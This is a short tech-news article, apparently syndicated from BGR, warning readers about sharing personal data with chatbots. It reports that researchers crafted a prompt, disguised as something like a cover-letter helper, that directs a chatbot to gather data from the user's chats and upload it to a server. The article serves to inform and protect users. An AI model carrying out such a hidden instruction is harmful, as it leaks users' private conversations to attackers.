I told you from the early days of ChatGPT that you should avoid giving the chatbot data that’s too personal. First, companies like OpenAI might use your conversations with the AI to train future models. You don’t want any personal data in there.
Then there’s the risk of hacks targeting your chatbot. Hackers might find ways to target your chats with cleverly crafted prompts that will instruct the AI to feed them personal data from your interactions with the program.
A team of researchers managed to pull off the latter, creating a prompt that would instruct a chatbot to collect data from your chats and upload them to a server. The best part about the hack is that you’d input the prompt yourself, thinking that you’re actually using some sort of advanced prompt to help you with a specific task.
For example, hackers can disguise malicious prompts as prompts to write cover letters for job applications. That’s something you might search the web yourself to improve the results from apps like ChatGPT.
The post Chatbot hack shows why you shouldn’t trust AI with your personal data appeared first on BGR.
Today’s Top Deals
Prime Day Yeedi robot vacuum deals: Best new models are up to $400 off
Today’s deals: Govee AI Sync Box 2, $55 Vizio soundbar, $499 M2 Mac mini, Acer Aspire Go 15 Slim laptop, more
Best Apple iPad deals of Prime Big Deal Days 2024, with prices from $199
Early Prime Day deals: Apple blowout, KitchenAid Stand Mixers, Dyson vacuums, $23 Echo Dot, OLED TVs, more
Chatbot hack shows why you shouldn’t trust AI with your personal data originally appeared on BGR.com on Sat, 19 Oct 2024 at 10:33:00 EDT. Please see our terms for use of feeds.